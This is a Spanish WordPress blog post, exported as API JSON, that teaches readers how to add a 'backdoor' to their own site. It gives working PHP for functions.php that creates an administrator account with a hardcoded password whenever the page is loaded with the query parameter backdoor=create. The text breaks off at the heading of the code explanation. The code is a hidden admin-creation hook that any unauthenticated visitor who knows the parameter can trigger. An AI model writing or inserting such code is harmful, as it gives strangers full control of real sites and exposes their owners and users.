{"id":257,"date":"2019-12-05T13:21:37","date_gmt":"2019-12-05T13:21:37","guid":{"rendered":"https:\/\/www.joaquinvelazquez.top\/blog\/\/?p=257"},"modified":"2021-01-25T16:44:16","modified_gmt":"2021-01-25T16:44:16","slug":"backdoor-en-wordpress","status":"publish","type":"post","link":"https:\/\/www.joaquinvelazquez.top\/blog\/backdoor-en-wordpress\/","title":{"rendered":"Backdoor en WordPress"},"content":{"rendered":"

Una de las cosas que me gusta de WordPress, sin duda alguna es la posibilidad de retocar el c\u00f3digo fuente<\/strong> y con ella la posibilidad de realizar muchas cosas.<\/p>\n

Por ejemplo crear una backdoor o puerta trasera<\/strong> y si este termino se te hace entendible, ahora te lo haremos entender.<\/p>\n

[php snippet=1]<\/p>\n

\u00bfQue es una backdoor?<\/h2>\n

\"que<\/p>\n

Generalmente una backdoor es una “herramienta” que permite crear accesos ocultos a un sitio web, un servidor web, un servidor ftp, una red local, etc, etc.<\/p>\n

La mayor\u00eda de estas BackDoor son generadas por error del propio usuario<\/strong>, programador, administradores de red<\/strong>, etc.<\/p>\n

Al ser un error por razones muy claras son riesgosas. El otro porcentaje de las Puertas traseras, son generadas bajo el conocimiento de las mismas<\/em><\/strong>, lo cual proporciona un peque\u00f1o nivel de seguridad.<\/p>\n

Pues en este punto, al conocer cuales son y como acceder, se pueden borrar cuando ya no se ocupen, y podr\u00e1s tomar an\u00e1lisis, aprender c\u00f3mo mejorarla y para todo tipo de fines de estudio.<\/p>\n

Todo lo contrario te ense\u00f1aremos a crear una para tu WordPress.<\/p>\n

\u00bfPor qu\u00e9 crear un backdoor en mi WordPress?<\/h2>\n

Imaginemos que por una extra\u00f1a raz\u00f3n olvidamos las credenciales de acceso a nuestro wordpress o incluso un atacante entro a nuestro sitio web y nos cambio todo.<\/p>\n

Si bien existe m\u00e9todos para recuperar las credenciales, el m\u00e1s r\u00e1pido es a trav\u00e9s de una propia puerta secreta, donde nosotros conocemos el usuario y el pass y de manera autom\u00e1tica se crea.<\/p>\n

Est\u00e9 es solo un ejemplo por que claro se puede usar para otras muchas cosas m\u00e1s… la imaginaci\u00f3n no tiene limites.<\/p>\n

Antes que nada, quiero aclarar que soy fan de varias webs, las sigo y me suscribo, porque llega a mi bandeja promociones, descuentos, sorpresas y nuevos art\u00edculos<\/strong>, entonces veo cuales me llaman la atenci\u00f3n y cuales no, por ello en el siguiente c\u00f3digo (y digo s\u00f3lo c\u00f3digo ) me lleg\u00f3 las novedades de metricspot<\/strong> donde aprend\u00ed lo que explicar\u00e9 en este art\u00edculo.<\/p><\/blockquote>\n

Creando un BackDoor en WordPress.<\/h2>\n

Como mencione antes el c\u00f3digo lo tom\u00e9 de Metricspot del art\u00edculo >> crear puerta trasera acceso wordpress<\/strong> <\/a><< \u00a0y es el siguiente:<\/p>\n

\/* Funci\u00f3n para crear una puerta trasera en WordPress *\/
\nadd_action('wp_head', 'puerta_trasera');
\nfunction puerta_trasera() {
\nIf ($_GET['backdoor'] == 'create') {
\nrequire('wp-includes\/registration.php');
\nIf (!username_exists('backdoor')) {
\n$user_id = wp_create_user('backdoor', 'c0ntra5eNYa');
\n$user = new WP_User($user_id);
\n$user->set_role('administrator');
\necho 'Puerta trasera creada';
\ndie();
\n}
\n}
\n}
\n<\/code><\/p>\n

Este c\u00f3digo se copia y pega al final de tu archivo function.php<\/strong> (en un taller de WordPress explicar\u00e9 esto, promesa<\/strong>) y sin m\u00e1s as\u00ed de simple y sencillo se a creado una puerta trasera, pero \u00bfY este c\u00f3digo c\u00f3mo funciona?<\/p>\n

Explicaci\u00f3n del c\u00f3digo backdoor en WordPress<\/h2>\n